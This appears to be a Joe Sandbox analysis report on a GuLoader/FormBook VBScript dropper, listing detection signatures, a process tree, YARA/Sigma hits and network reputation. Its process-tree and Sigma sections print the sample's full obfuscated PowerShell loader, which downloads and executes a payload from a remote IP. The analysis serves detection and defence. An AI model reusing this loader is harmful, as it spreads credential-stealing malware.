Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FTG_PD_04024024001.vbs

Overview

General Information

Sample name:FTG_PD_04024024001.vbs
Analysis ID:1431505
MD5:0d167ef616c14b868472f78d1195fdf3
SHA1:d203ebbb35564dd406590d84b4c73cf310104634
SHA256:6c4ed597f8ac1bf79f88afe6704c467c3629247824efb12ab35a72fd52176e84
Tags:GuloaderHUNvbs
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 3680 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FTG_PD_04024024001.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 4268 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hovedafbryderes = 1;$Dives='Substrin';$Dives+='g';Function Rumper($Ninox){$Tomatillo=$Ninox.Length-$Hovedafbryderes;For($Skumle=1; $Skumle -lt $Tomatillo; $Skumle+=(2)){$Tiredly+=$Ninox.$Dives.Invoke($Skumle, $Hovedafbryderes);}$Tiredly;}function Funmaker($Fedtsyrers){. ($inclosers) ($Fedtsyrers);}$Wacky=Rumper 'BM o,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN,T 1.0P. 0S;S WNi nC6,4,;D Sx 6,4T; r,vL: 1N2I1J. 0.). VG.e.cFkCoS/ 2 0,1S0F0 1I0r1E LF,iIr.e fSo.x /R1.2L1 . 0 ';$Sials=Rumper 'TUBsNe,r -LA.gPe n tU ';$Mucormycosis=Rumper ' hRt t,pt: /./.8O7T..1 2L1...1.0i5C..1 6s3A/,S.t eSr.ePoSt,y,pLeOr iun gIe n,sB7 2 .,x,sEnL ';$lecideiform=Rumper 'G>U ';$inclosers=Rumper ' i e,xS ';$Salrs227='Revanchister';Funmaker (Rumper ',SMeOt -,C.o,nZt eSn tF -.P.aUtPh UTG:B\aDSi,b r oOm,o b e n zPe n eC.Ft,x t - VAaPl uLe $JSPa lUrKs 2 2 7T;s ');Funmaker (Rumper 'pi,f, G(,t eBs.t -RpAaDtSh. TTP:c\RD iUb,r oGmSoFbAe.nPz eSn,eE. tTx,t,) {DeWx i tD}C;, ');$Southrons = Rumper 'Te.cMhOo. ,%Ba,p,p d aKtWaD%I\HA.r g,eSaRnA.OM e nC t&s&D eHc hKo $ ';Funmaker (Rumper 'S$Cg.l.oAb,a l.:.U m oBtLi vSeSr eVd eBs =K(,ctmFdF / c ,$ S oSu tkh.rPoCn,s )U ');Funmaker (Rumper 'F$ gNl.oUbTaKl :GDse,f iTl.e.sV1 2 2S= $UMMuIcSoFrPm,y cSo,s,iUsp.As p.l i tE(,$ l eTcXiLd eGiBfFo.r mT)M ');$Mucormycosis=$Defiles122[0];Funmaker (Rumper ' $.gFl oDbSaSl : GGrRa,a,l i g sPt eE=GN.efwk-.O,b.j eCcJtW HSSy sNt e.mE.XN e,tG.DW,enbNC l,iLe.nOtF ');Funmaker (Rumper 'S$tGDrSa aRl.i.gEs.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckSy ');$Folkekongressen=Rumper 'uGpr aAaAl.i gTsHtde..aD,oSw,n l oRa.dKF,i lMeS(H$.MBuUc,oFrKmPyEcroPs,i sR,C$Sa fGm,n.sUtMrKeUnRd.ems ) ';$Folkekongressen=$Umotiveredes[1]+$Folkekongressen;$afmnstrendes=$Umotiveredes[0];Funmaker (Rumper ' $ g,l ofbHaWl :.f rSi.t nLkSeRr i =K(MTNe s tQ-KP,aSt,h T$FaTfGm nGs.tGrzeMn dSeMs )P ');while (!$fritnkeri) {Funmaker (Rumper ' $Dg.l o bEa,lP:SP.aRr kJe,rHiHn gJsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekongressen;Funmaker (Rumper 'TSNtKaLrst -GSSl eFeNpG S4A ');Funmaker (Rumper 'R$SgAlBoPb.aClE:Cf.rkiTt nTk eOr iR=E(NT,eUsFtF-,P ast.hA $.aCf mPnCs t rCe nGdIe,sE)H ') ;Funmaker (Rumper ' $Ug.lMoSbHa lS: B,oDl dDgBa dSe n = $,g l.oHbFaDlU:UB,rPu,nZk uBl s,l eBj eRtB+H+K% $DDOelf,i l e.s 1P2S2 .Rc o,u nMt ') ;$Mucormycosis=$Defiles122[$Boldgaden];}Funmaker (Rumper ' $.gOlPoDb.aNl :UFVrSe,mLaDdUsWt r b e n d e,sR =B KG e tN- C.oPnZt enn.tS .$Oa,f mTnZs,t,r.eEnAdIe sS ');Funmaker (Rumper 'D$SgCl.oGbMaAlS:APShHi l o,nCi cS K=A [SS yTsTtMe.mE. CIo n.vSe,r,t,] :B: FFrSo,m B aSs.e 6,4BS tDrOiHnAg (,$SF rAeUm aFdMs t r,bAe n dKeksR)M ');Funmaker (Rumper 'E$TgJlPo bAaBl.:TBAs,sCeTlIb,e t s, .=K [ S,y.sCt e,m . T ePxIt . E n cIoDdSi,nAgO] :P:MA S C,IDIS.VG.e tHS.tRr i nMgF(c$MP hTi l,o n.i,cE) ');Funmaker (Rumper 'M$Eg,lSoPb aal :CLKaBr.y.npgRoOtRoGmFeF=R$,B,s sPeAlPbSe tRsD.Ds uQbMsTt r.iSnMgS(S2.7 7 8 2R2H, 2 6 6,5P1U)V ');Funmaker $Laryngotome;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6428 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Argean.Men && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5328 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hovedafbryderes = 1;$Dives='Substrin';$Dives+='g';Function Rumper($Ninox){$Tomatillo=$Ninox.Length-$Hovedafbryderes;For($Skumle=1; $Skumle -lt $Tomatillo; $Skumle+=(2)){$Tiredly+=$Ninox.$Dives.Invoke($Skumle, $Hovedafbryderes);}$Tiredly;}function Funmaker($Fedtsyrers){. ($inclosers) ($Fedtsyrers);}$Wacky=Rumper 'BM o,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN,T 1.0P. 0S;S WNi nC6,4,;D Sx 6,4T; r,vL: 1N2I1J. 0.). VG.e.cFkCoS/ 2 0,1S0F0 1I0r1E LF,iIr.e fSo.x /R1.2L1 . 0 ';$Sials=Rumper 'TUBsNe,r -LA.gPe n tU ';$Mucormycosis=Rumper ' hRt t,pt: /./.8O7T..1 2L1...1.0i5C..1 6s3A/,S.t eSr.ePoSt,y,pLeOr iun gIe n,sB7 2 .,x,sEnL ';$lecideiform=Rumper 'G>U ';$inclosers=Rumper ' i e,xS ';$Salrs227='Revanchister';Funmaker (Rumper ',SMeOt -,C.o,nZt eSn tF -.P.aUtPh UTG:B\aDSi,b r oOm,o b e n zPe n eC.Ft,x t - VAaPl uLe $JSPa lUrKs 2 2 7T;s ');Funmaker (Rumper 'pi,f, G(,t eBs.t -RpAaDtSh. TTP:c\RD iUb,r oGmSoFbAe.nPz eSn,eE. tTx,t,) {DeWx i tD}C;, ');$Southrons = Rumper 'Te.cMhOo. ,%Ba,p,p d aKtWaD%I\HA.r g,eSaRnA.OM e nC t&s&D eHc hKo $ ';Funmaker (Rumper 'S$Cg.l.oAb,a l.:.U m oBtLi vSeSr eVd eBs =K(,ctmFdF / c ,$ S oSu tkh.rPoCn,s )U ');Funmaker (Rumper 'F$ gNl.oUbTaKl :GDse,f iTl.e.sV1 2 2S= $UMMuIcSoFrPm,y cSo,s,iUsp.As p.l i tE(,$ l eTcXiLd eGiBfFo.r mT)M ');$Mucormycosis=$Defiles122[0];Funmaker (Rumper ' $.gFl oDbSaSl : GGrRa,a,l i g sPt eE=GN.efwk-.O,b.j eCcJtW HSSy sNt e.mE.XN e,tG.DW,enbNC l,iLe.nOtF ');Funmaker (Rumper 'S$tGDrSa aRl.i.gEs.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckSy ');$Folkekongressen=Rumper 'uGpr aAaAl.i gTsHtde..aD,oSw,n l oRa.dKF,i lMeS(H$.MBuUc,oFrKmPyEcroPs,i sR,C$Sa fGm,n.sUtMrKeUnRd.ems ) ';$Folkekongressen=$Umotiveredes[1]+$Folkekongressen;$afmnstrendes=$Umotiveredes[0];Funmaker (Rumper ' $ g,l ofbHaWl :.f rSi.t nLkSeRr i =K(MTNe s tQ-KP,aSt,h T$FaTfGm nGs.tGrzeMn dSeMs )P ');while (!$fritnkeri) {Funmaker (Rumper ' $Dg.l o bEa,lP:SP.aRr kJe,rHiHn gJsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekongressen;Funmaker (Rumper 'TSNtKaLrst -GSSl eFeNpG S4A ');Funmaker (Rumper 'R$SgAlBoPb.aClE:Cf.rkiTt nTk eOr iR=E(NT,eUsFtF-,P ast.hA $.aCf mPnCs t rCe nGdIe,sE)H ') ;Funmaker (Rumper ' $Ug.lMoSbHa lS: B,oDl dDgBa dSe n = $,g l.oHbFaDlU:UB,rPu,nZk uBl s,l eBj eRtB+H+K% $DDOelf,i l e.s 1P2S2 .Rc o,u nMt ') ;$Mucormycosis=$Defiles122[$Boldgaden];}Funmaker (Rumper ' $.gOlPoDb.aNl :UFVrSe,mLaDdUsWt r b e n d e,sR =B KG e tN- C.oPnZt enn.tS .$Oa,f mTnZs,t,r.eEnAdIe sS ');Funmaker (Rumper 'D$SgCl.oGbMaAlS:APShHi l o,nCi cS K=A [SS yTsTtMe.mE. CIo n.vSe,r,t,] :B: FFrSo,m B aSs.e 6,4BS tDrOiHnAg (,$SF rAeUm aFdMs t r,bAe n dKeksR)M ');Funmaker (Rumper 'E$TgJlPo bAaBl.:TBAs,sCeTlIb,e t s, .=K [ S,y.sCt e,m . T ePxIt . E n cIoDdSi,nAgO] :P:MA S C,IDIS.VG.e tHS.tRr i nMgF(c$MP hTi l,o n.i,cE) ');Funmaker (Rumper 'M$Eg,lSoPb aal :CLKaBr.y.npgRoOtRoGmFeF=R$,B,s sPeAlPbSe tRsD.Ds uQbMsTt r.iSnMgS(S2.7 7 8 2R2H, 2 6 6,5P1U)V ');Funmaker $Laryngotome;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 3680 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Argean.Men && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 1436 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • lgoTSqyYpvNuVXUkRnDp.exe (PID: 4088 cmdline: "C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • AtBroker.exe (PID: 3620 cmdline: "C:\Windows\SysWOW64\AtBroker.exe" MD5: D5B61959A509BDA85300781F5A829610)
              • firefox.exe (PID: 1712 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • wab.exe (PID: 2656 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 2472 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • wab.exe (PID: 2624 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x69cf8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x53a57:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000B.00000002.3309988573.0000000002FD0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000B.00000002.3309988573.0000000002FD0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2b720:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1547f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000008.00000002.2821245767.0000000025220000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 15 entries
        SourceRuleDescriptionAuthorStrings
        amsi64_4268.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xf06a:$b2: ::FromBase64String(
        • 0xc402:$s1: -join
        • 0x5bae:$s4: +=
        • 0x5c70:$s4: +=
        • 0x9e97:$s4: +=
        • 0xbfb4:$s4: +=
        • 0xc29e:$s4: +=
        • 0xc3e4:$s4: +=
        • 0xe637:$s4: +=
        • 0xe6b7:$s4: +=
        • 0xe77d:$s4: +=
        • 0xe7fd:$s4: +=
        • 0xe9d3:$s4: +=
        • 0xea57:$s4: +=
        • 0xcb20:$e4: Get-WmiObject
        • 0xcd0f:$e4: Get-Process
        • 0xcd67:$e4: Start-Process
        amsi32_5328.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xefc7:$b2: ::FromBase64String(
        • 0xc402:$s1: -join
        • 0x5bae:$s4: +=
        • 0x5c70:$s4: +=
        • 0x9e97:$s4: +=
        • 0xbfb4:$s4: +=
        • 0xc29e:$s4: +=
        • 0xc3e4:$s4: +=
        • 0xe637:$s4: +=
        • 0xe6b7:$s4: +=
        • 0xe77d:$s4: +=
        • 0xe7fd:$s4: +=
        • 0xe9d3:$s4: +=
        • 0xea57:$s4: +=
        • 0xcb20:$e4: Get-WmiObject
        • 0xcd0f:$e4: Get-Process
        • 0xcd67:$e4: Start-Process
        • 0x161de:$e4: Get-Process

        System Summary

        barindex
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FTG_PD_04024024001.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FTG_PD_04024024001.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5328, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FTG_PD_04024024001.vbs", ProcessId: 3680, ProcessName: wscript.exe
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe" , CommandLine: "C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe, NewProcessName: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe, OriginalFileName: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 1436, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe" , ProcessId: 4088, ProcessName: lgoTSqyYpvNuVXUkRnDp.exe
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\windows mail\wab.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\AtBroker.exe, ProcessId: 3620, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AJ5HR8DXLPTX
        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FTG_PD_04024024001.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FTG_PD_04024024001.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5328, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FTG_PD_04024024001.vbs", ProcessId: 3680, ProcessName: wscript.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hovedafbryderes = 1;$Dives='Substrin';$Dives+='g';Function Rumper($Ninox){$Tomatillo=$Ninox.Length-$Hovedafbryderes;For($Skumle=1; $Skumle -lt $Tomatillo; $Skumle+=(2)){$Tiredly+=$Ninox.$Dives.Invoke($Skumle, $Hovedafbryderes);}$Tiredly;}function Funmaker($Fedtsyrers){. ($inclosers) ($Fedtsyrers);}$Wacky=Rumper 'BM o,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN,T 1.0P. 0S;S WNi nC6,4,;D Sx 6,4T; r,vL: 1N2I1J. 0.). VG.e.cFkCoS/ 2 0,1S0F0 1I0r1E LF,iIr.e fSo.x /R1.2L1 . 0 ';$Sials=Rumper 'TUBsNe,r -LA.gPe n tU ';$Mucormycosis=Rumper ' hRt t,pt: /./.8O7T..1 2L1...1.0i5C..1 6s3A/,S.t eSr.ePoSt,y,pLeOr iun gIe n,sB7 2 .,x,sEnL ';$lecideiform=Rumper 'G>U ';$inclosers=Rumper ' i e,xS ';$Salrs227='Revanchister';Funmaker (Rumper ',SMeOt -,C.o,nZt eSn tF -.P.aUtPh UTG:B\aDSi,b r oOm,o b e n zPe n eC.Ft,x t - VAaPl uLe $JSPa lUrKs 2 2 7T;s ');Funmaker (Rumper 'pi,f, G(,t eBs.t -RpAaDtSh. TTP:c\RD iUb,r oGmSoFbAe.nPz eSn,eE. tTx,t,) {DeWx i tD}C;, ');$Southrons = Rumper 'Te.cMhOo. ,%Ba,p,p d aKtWaD%I\HA.r g,eSaRnA.OM e nC t&s&D eHc hKo $ ';Funmaker (Rumper 'S$Cg.l.oAb,a l.:.U m oBtLi vSeSr eVd eBs =K(,ctmFdF / c ,$ S oSu tkh.rPoCn,s )U ');Funmaker (Rumper 'F$ gNl.oUbTaKl :GDse,f iTl.e.sV1 2 2S= $UMMuIcSoFrPm,y cSo,s,iUsp.As p.l i tE(,$ l eTcXiLd eGiBfFo.r mT)M ');$Mucormycosis=$Defiles122[0];Funmaker (Rumper ' $.gFl oDbSaSl : GGrRa,a,l i g sPt eE=GN.efwk-.O,b.j eCcJtW HSSy sNt e.mE.XN e,tG.DW,enbNC l,iLe.nOtF ');Funmaker (Rumper 'S$tGDrSa aRl.i.gEs.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckSy ');$Folkekongressen=Rumper 'uGpr aAaAl.i gTsHtde..aD,oSw,n l oRa.dKF,i lMeS(H$.MBuUc,oFrKmPyEcroPs,i sR,C$Sa fGm,n.sUtMrKeUnRd.ems ) ';$Folkekongressen=$Umotiveredes[1]+$Folkekongressen;$afmnstrendes=$Umotiveredes[0];Funmaker (Rumper ' $ g,l ofbHaWl :.f rSi.t nLkSeRr i =K(MTNe s tQ-KP,aSt,h T$FaTfGm nGs.tGrzeMn dSeMs )P ');while (!$fritnkeri) {Funmaker (Rumper ' $Dg.l o bEa,lP:SP.aRr kJe,rHiHn gJsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekongressen;Funmaker (Rumper 'TSNtKaLrst -GSSl eFeNpG S4A ');Funmaker (Rumper 'R$SgAlBoPb.aClE:Cf.rkiTt nTk eOr iR=E(NT,eUsFtF-,P ast.hA $.aCf mPnCs t rCe nGdIe,sE)H ') ;Funmaker (Rumper ' $Ug.lMoSbHa lS: B,oDl dDgBa dSe n = $,g l.oHbFaDlU:UB,rPu,nZk uBl s,l eBj eRtB+H+K% $DDOelf,i l e.s 1P2S2 .Rc o,u nMt ') ;$Mucormycosis=$Defiles122[$Boldgaden];}Funmaker (Rumper ' $.gOlPoDb.aNl :UFVrSe,mLaDdUsWt r b e n d e,sR =B KG e tN- C.oPnZt enn.tS .$Oa,f mTnZs,t,r.eEnAdIe sS ');Funmaker (Rumper 'D$SgCl.oGbMaAlS:APShHi l o,nCi cS K=A [SS yTsTtMe.mE. CIo n.vSe,r,t,] :B: FFrSo,m B aSs.e 6,4BS tDrOiHnAg (,$SF rAeUm aFdMs t r,bAe n dKeksR)M ');Funmaker (Rumper 'E$TgJlPo bAaBl.:TBAs,sCeTlIb,e t s, .=K [ S,y.sCt e,m . T ePxIt . E n cIoDdSi,nAgO] :P:MA S C,IDIS.VG.e tHS.tRr i nMgF(c$MP hTi l,o n.i,cE) ');Funmaker (Rumper 'M$Eg,lSoPb aal :CLKaBr.y.npgRoOtRoGmFeF=R$,B,s sPeAlPbSe tRsD.Ds uQbMsTt r.iSnMgS(S2.7 7 8 2R2H, 2 6 6,5P1U)V ');Funmaker $Laryngotome;", CommandLine: "
        Timestamp:04/25/24-11:04:26.578950
        SID:2855465
        Source Port:49717
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
        Source: www.oyoing.comVirustotal: Detection: 9%Perma Link
        Source: www.tyaer.comVirustotal: Detection: 10%Perma Link
        Source: http://87.121.105.163Virustotal: Detection: 18%Perma Link
        Source: http://87.121.105.163/Virustotal: Detection: 18%Perma Link
        Source: Yara matchFile source: 0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.3309988573.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2821245767.0000000025220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2802296347.0000000002E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.3309922219.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb(g source: powershell.exe, 00000005.00000002.2486548561.0000000008A4B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2482681439.0000000007984000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ols\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.2486768538.0000000008AAA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2470735399.0000000003368000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5v source: powershell.exe, 00000005.00000002.2482681439.00000000079E1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5V source: powershell.exe, 00000005.00000002.2482681439.00000000079E1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb0 source: powershell.exe, 00000005.00000002.2486548561.0000000008A4B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ATBroker.pdb source: wab.exe, 00000008.00000003.2770400381.0000000006A4B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2770842443.0000000006A5B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: wab.exe, 00000008.00000003.2709190569.0000000022373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2711294298.0000000022520000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2470735399.000000000332C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 00000008.00000003.2709190569.0000000022373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2711294298.0000000022520000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe
        Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2486548561.0000000008A20000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ATBroker.pdbGCTL source: wab.exe, 00000008.00000003.2770400381.0000000006A4B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2770842443.0000000006A5B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2470735399.000000000332C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: re.pdb source: powershell.exe, 00000005.00000002.2486768538.0000000008AAA000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_02CED1C0 FindFirstFileW,FindNextFileW,FindClose,11_2_02CED1C0

        Software Vulnerabilities

